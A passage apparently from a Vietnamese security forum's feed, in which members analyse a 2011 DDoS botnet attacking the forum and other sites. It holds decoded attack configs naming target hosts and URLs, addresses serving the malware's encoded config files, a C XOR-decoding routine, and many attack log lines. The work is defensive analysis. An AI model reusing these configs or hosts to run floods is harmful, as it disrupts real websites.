7. GET / HTTP/1.1\r\nHost: vrvradio.com\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 115\r\nConnection: keep-alive
 http://vrvradio.com
8. GET /dan_lam_bao_07082011/latest.rss HTTP/1.1\r\nHost: danlambaovn.disqus.com\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 115\r\nConnection: keep-alive
 http://danlambaovn.disqus.com
/dan_lam_bao_07082011/latest.rss
9. GET /dan_lam_bao_thong_bao_khan_cap_ca_tiep_tuc_bat_bo_nguoi_cong_giao_tai_vinh/latest.rss HTTP/1.1\r\nHost: danlambaovn.disqus.com\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 115\r\nConnection: keep-alive
 http://danlambaovn.disqus.com
/dan_lam_bao_thong_bao_khan_cap_ca_tiep_tuc_bat_bo_nguoi_cong_giao_tai_vinh/latest.rss
10. GET /dan_lam_bao_toi_phai_noi_toi_phai_gao/latest.rss HTTP/1.1\r\nHost: danlambaovn.disqus.com\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 115\r\nConnection: keep-alive
 http://danlambaovn.disqus.com
/dan_lam_bao_toi_phai_noi_toi_phai_gao/latest.rss
Host second.dinest.net lại được stl đánh thức dậy để hoạt động. xc.jpg tại: http://second.dinest.net/xc.jpg (User-Agent: An0nym0453) đã thay đổi cách mã hoá, nên tool decode lúc trước sẽ không decode hết được. Đang chờ đợi acoustics89 RE và cập nhật tool decode.]]>
/hvaonline/posts/list/39641.html#244867 /hvaonline/posts/list/39641.html#244867 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Decode xc.jpg Code:
<item enabled="0" threads="5" delay="5" method="GET" protocol="http" host="www.hvaonline.net" port="80" rootURI="/" uri="/hvaonline/forums/list.html" keepCookies="1" crawling="1" referer="/tof/"/>
Ngưng DDoS hva !? Vẫn mã hoá vậy thôi, việc thay đổi mã hoá cần mẫu mới thì mới có thể thực hiện (thay hẳn file, hoặc dùng mẫu khác Inject lại Code khác...). Code vậy anh TQN chế hoài ah... (~,~). Track của mình cũng cập nhật thay đổi của các site này. Nhưng rõ ràng là còn các mẫu khác chưa được phát hiện... Cuộc chiến còn dài, há há. s3ll mong anh Conmale up lên một vài đoạn *.log web và firewall để tham khảo nha. s3ll cũng muốn phân tích thêm các *.log này. Nếu không tiện anh Conmale gửi riêng cho s3ll qua tin nhắn hoặc mail... Thanks !]]>
/hvaonline/posts/list/39641.html#244874 /hvaonline/posts/list/39641.html#244874 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Host second.dinest.net lại được stl đánh thức dậy để hoạt động. xc.jpg tại: http://second.dinest.net/xc.jpg (User-Agent: An0nym0453) đã thay đổi cách mã hoá, nên tool decode lúc trước sẽ không decode hết được. Đang chờ đợi acoustics89 RE và cập nhật tool decode. 
em tưởng anh TQN bảo code giải mã file TOP, em post rồi đấy, còn cái kia thì vẫn decode bình thường mà, có lỗi gì đâu]]>
/hvaonline/posts/list/39641.html#244875 /hvaonline/posts/list/39641.html#244875 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244879 /hvaonline/posts/list/39641.html#244879 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Ừ, lạ ha ! Sao giờ decode lại được, lúc chiều wget về thì decode không được ? Cảm ơn acoustics89 nhé ! À anh quên mất, hồi đó em có PM cho anh, anh xoá mất rồi. Mẫu nào download thằng top.jpg từ http://penop.net/top.jpg ? Sẵn tiện acoustics89 xem lại hàm decode top.jpg của em luôn nhé, anh build hay dựa trên nó viết script đều decode không ra. 
thuật toán decode thì đoạn này là quan trọng nhất, em decode ra 1 xâu unicode nhưng mà làm vội nên cứ để nguyên thế mà ném vào file txt, anh mở ra thì thấy nó có khoảng cách, dùng tạm cũng được. mẫu tải top là googlecrashhandler, từ đâu chắc anh vẫn nhớ :D Code:
fseek(f, 0, SEEK_END);
 		lSize = ftell(f);
 		fseek(f, 0, SEEK_SET);
 
 		pBuffer =(char*) malloc(lSize+1024);
 		if(pBuffer)
 		{
 			
 			p = (char *)pBuffer+ 4;
 			memset(pBuffer, 0, lSize+1024);
 			fread((char*)pBuffer, lSize, 1, f);
 
 			for ( i = 8; i < lSize; ++i )
 			{
 				v24 = p[v7 % 4];
 				v23 = pBuffer[i];
 				v23 = (v24 ^ v23) % 256;
 				pBuffer[i] = v23;
 				v7++;
 				//v8 += v23 * v7++ % 7;
 			}
 		}
 		fclose(f);
]]>
/hvaonline/posts/list/39641.html#244883 /hvaonline/posts/list/39641.html#244883 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. 1. Dạng referer "/" với hàng loạt User-Agent thay đổi: Code:
113.160.40.198 - - [19/Jul/2011:22:47:19 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/" "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.04 Chromium/10.0.612.3 Chrome/10.0.612.3 Safari/534.15"
113.160.40.198 - - [19/Jul/2011:22:48:54 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.1"
113.160.40.198 - - [19/Jul/2011:22:59:57 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8"
113.160.40.198 - - [19/Jul/2011:23:01:37 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.0"
113.160.40.198 - - [19/Jul/2011:23:04:44 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/" "Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-TW; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8"
113.160.40.198 - - [19/Jul/2011:23:06:19 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/" "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.04 Chromium/10.0.612.3 Chrome/10.0.612.3 Safari/534.15"
113.160.40.198 - - [19/Jul/2011:23:07:54 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/" "Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-TW; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8"
113.160.40.198 - - [19/Jul/2011:23:09:25 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7"
113.160.40.198 - - [19/Jul/2011:23:12:36 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.2.7) Gecko/20100713 Firefox/3.6.7 (.NET CLR 3.5.30729)"
113.160.40.198 - - [19/Jul/2011:23:14:11 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/" "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
113.160.40.198 - - [19/Jul/2011:23:17:21 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/" "Opera/9.80 (Windows NT 6.0; U; en) Presto/2.7.39 Version/11.00"
113.160.40.198 - - [19/Jul/2011:23:20:32 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0"
113.160.40.198 - - [19/Jul/2011:23:22:07 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.0; Trident/4.0; InfoPath.1; SV1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 3.0.04506.30)"
2. Dạng referer "/hvaonline/forums/list.html" cũng với hàng loạt User-Agent thay đổi: Code:
113.160.40.34 - - [19/Jul/2011:04:03:46 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
113.160.40.34 - - [19/Jul/2011:04:05:21 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)"
113.160.40.34 - - [19/Jul/2011:04:06:56 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.0"
113.160.40.34 - - [19/Jul/2011:04:08:31 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.0"
113.160.40.34 - - [19/Jul/2011:04:10:06 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))"
113.160.40.34 - - [19/Jul/2011:04:11:41 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)"
113.160.40.34 - - [19/Jul/2011:04:13:11 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.0"
113.160.40.34 - - [19/Jul/2011:04:14:46 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.04 Chromium/10.0.612.3 Chrome/10.0.612.3 Safari/534.15, "
113.160.40.34 - - [19/Jul/2011:04:16:21 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)"
113.160.40.34 - - [19/Jul/2011:04:18:01 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Opera/9.80 (Windows NT 5.1; U; it) Presto/2.7.62 Version/11.00"
113.160.40.34 - - [19/Jul/2011:04:19:31 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.7) Gecko/20100726 CentOS/3.6-3.el5.centos Firefox/3.6.7"
113.160.40.34 - - [19/Jul/2011:04:21:09 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)"
113.160.40.34 - - [19/Jul/2011:04:22:42 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Opera/9.80 (Windows NT 5.1; U; it) Presto/2.7.62 Version/11.00"
113.160.40.34 - - [19/Jul/2011:04:24:17 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)"
113.160.40.34 - - [19/Jul/2011:04:25:52 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)"
113.160.40.34 - - [19/Jul/2011:04:27:27 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.04 Chromium/10.0.612.3 Chrome/10.0.612.3 Safari/534.15, "
113.160.40.34 - - [19/Jul/2011:04:29:02 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Opera/9.80 (Windows NT 5.1; U; it) Presto/2.7.62 Version/11.00"
113.160.40.34 - - [19/Jul/2011:04:30:37 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7)"
113.160.40.34 - - [19/Jul/2011:04:32:07 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100723 Fedora/3.6.7-1.fc13 Firefox/3.6.7"
113.160.40.34 - - [19/Jul/2011:04:33:42 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)"
3. Dạng "đánh" trực tiếp với JSSESSIONID kèm theo và không có referer: Code:
113.172.82.238 - - [04/Aug/2011:12:41:30 +0200] "GET /hvaonline/forums/show/28.html;jsessionid=747B94BCC8985E471C236CEFD7567212 HTTP/1.1" 403 861 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30"
113.172.82.238 - - [04/Aug/2011:12:41:33 +0200] "GET /hvaonline/forums/show/28.html;jsessionid=747B94BCC8985E471C236CEFD7567212 HTTP/1.1" 403 861 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30"
113.172.82.238 - - [04/Aug/2011:12:41:40 +0200] "GET /hvaonline/forums/show/28.html;jsessionid=747B94BCC8985E471C236CEFD7567212 HTTP/1.1" 403 861 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30"
113.172.82.238 - - [04/Aug/2011:12:41:42 +0200] "GET /hvaonline/forums/show/28.html;jsessionid=747B94BCC8985E471C236CEFD7567212 HTTP/1.1" 403 861 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30"
113.162.86.251 - - [04/Aug/2011:12:41:44 +0200] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.7) Gecko/20100726 CentOS/3.6-3.el5.centos Firefox/3.6.7"
113.172.82.238 - - [04/Aug/2011:12:41:47 +0200] "GET /hvaonline/forums/show/28.html;jsessionid=747B94BCC8985E471C236CEFD7567212 HTTP/1.1" 403 861 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30"
113.172.82.238 - - [04/Aug/2011:12:42:05 +0200] "GET /hvaonline/forums/show/31.html;jsessionid=747B94BCC8985E471C236CEFD7567212 HTTP/1.1" 403 861 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30"
157.55.112.210 - - [04/Aug/2011:12:43:00 +0200] "GET /hvaonline/user/profile/207459.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;  WOW64;  Trident/5.0)"
209.131.36.219 - - [04/Aug/2011:12:43:01 +0200] "GET /hvaonline/posts/list/27555.html;jsessionid=377F92127EBC7057241C547F8A3D5E5B HTTP/1.1" 403 2108 "-" "-"
113.172.82.238 - - [04/Aug/2011:12:43:17 +0200] "GET /hvaonline/posts/list/39694.html;jsessionid=747B94BCC8985E471C236CEFD7567212 HTTP/1.1" 403 861 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30"
113.172.82.238 - - [04/Aug/2011:12:43:20 +0200] "GET /hvaonline/posts/list/39694.html;jsessionid=747B94BCC8985E471C236CEFD7567212 HTTP/1.1" 403 861 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30"
4. Đạng đánh vô trang chủ (/) không cần có referer: Code:
58.187.123.50 - - [03/Aug/2011:16:36:38 +0900] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100723 Fedora/3.6.7-1.fc13 Firefox/3.6.7"
58.187.123.50 - - [03/Aug/2011:16:36:38 +0900] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.1"
58.187.123.50 - - [03/Aug/2011:16:36:38 +0900] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.0"
58.187.123.50 - - [03/Aug/2011:16:36:38 +0900] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10"
58.187.123.50 - - [03/Aug/2011:16:36:38 +0900] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100723 Fedora/3.6.7-1.fc13 Firefox/3.6.7"
58.187.123.50 - - [03/Aug/2011:16:36:38 +0900] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.1"
58.187.123.50 - - [03/Aug/2011:16:36:38 +0900] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.0"
58.187.123.50 - - [03/Aug/2011:16:36:38 +0900] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.0"
58.187.123.50 - - [03/Aug/2011:16:36:38 +0900] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10"
58.187.123.50 - - [03/Aug/2011:16:36:38 +0900] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.1"
58.187.123.50 - - [03/Aug/2011:16:36:38 +0900] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.0"
58.187.123.50 - - [03/Aug/2011:16:36:38 +0900] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10"
58.187.123.50 - - [03/Aug/2011:16:36:38 +0900] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.0"
58.187.123.50 - - [03/Aug/2011:16:36:41 +0900] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.0"
58.187.123.50 - - [03/Aug/2011:16:36:41 +0900] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100723 Fedora/3.6.7-1.fc13 Firefox/3.6.7"
5. Dạng giả mạo "crawler" thứ thiệt: Code:
190.14.250.118 - - [03/Aug/2011:21:08:07 +0200] "GET /hvaonline/forums/show/31.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
175.111.89.16 - - [03/Aug/2011:21:08:08 +0200] "GET /hvaonline/forums/show/23.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.189.89.153 - - [03/Aug/2011:21:08:08 +0200] "GET /hvaonline/forums/show/31.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.189.89.153 - - [03/Aug/2011:21:08:08 +0200] "GET /hvaonline/forums/show/31.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.189.89.153 - - [03/Aug/2011:21:08:08 +0200] "GET /hvaonline/forums/show/19.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
175.111.89.16 - - [03/Aug/2011:21:08:08 +0200] "GET /hvaonline/forums/show/23.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
201.49.209.206 - - [03/Aug/2011:21:08:09 +0200] "GET /hvaonline/forums/list.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.189.89.153 - - [03/Aug/2011:21:08:09 +0200] "GET /hvaonline/forums/show/19.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.124.178.98 - - [03/Aug/2011:21:08:09 +0200] "GET /hvaonline/forums/list.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.124.178.98 - - [03/Aug/2011:21:08:09 +0200] "GET /hvaonline/forums/show/50.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.124.178.98 - - [03/Aug/2011:21:08:09 +0200] "GET /hvaonline/forums/list.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.124.178.98 - - [03/Aug/2011:21:08:10 +0200] "GET /hvaonline/forums/list.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.124.178.98 - - [03/Aug/2011:21:08:10 +0200] "GET /hvaonline/forums/show/50.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.124.178.98 - - [03/Aug/2011:21:08:10 +0200] "GET /hvaonline/forums/list.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.124.178.98 - - [03/Aug/2011:21:08:10 +0200] "GET /hvaonline/forums/list.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.219.67.187 - - [03/Aug/2011:21:08:11 +0200] "GET /hvaonline/forums/list.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.219.67.187 - - [03/Aug/2011:21:08:11 +0200] "GET /hvaonline/forums/show/19.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.219.67.187 - - [03/Aug/2011:21:08:11 +0200] "GET /hvaonline/forums/list.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
118.98.232.132 - - [03/Aug/2011:21:08:11 +0200] "GET /hvaonline/forums/list.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
175.100.114.170 - - [03/Aug/2011:21:08:11 +0200] "GET /hvaonline/forums/list.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.219.67.187 - - [03/Aug/2011:21:08:11 +0200] "GET /hvaonline/forums/show/19.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
202.91.88.200 - - [03/Aug/2011:21:08:11 +0200] "GET /hvaonline/forums/show/31.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
95.170.208.138 - - [03/Aug/2011:21:08:11 +0200] "GET /hvaonline/forums/show/50.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
118.97.237.109 - - [03/Aug/2011:21:08:12 +0200] "GET /hvaonline/forums/list.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
95.170.208.138 - - [03/Aug/2011:21:08:12 +0200] "GET /hvaonline/forums/show/50.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.219.67.187 - - [03/Aug/2011:21:08:12 +0200] "GET /hvaonline/posts/list/14876.html#88643 HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
175.100.114.170 - - [03/Aug/2011:21:08:12 +0200] "GET /hvaonline/forums/list.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
118.97.237.109 - - [03/Aug/2011:21:08:12 +0200] "GET /hvaonline/posts/list/39654.html#244533 HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)
"
6. Dạng sử dụng referer "/tof/" để access trang chủ và forum: Code:
117.2.133.220 - - [10/Aug/2011:05:55:49 -0500] "GET / HTTP/1.1" 403 2108 "/tof/" "Opera/9.80 (Windows NT 6.0; U; en) Presto/2.7.39 Version/11.00"
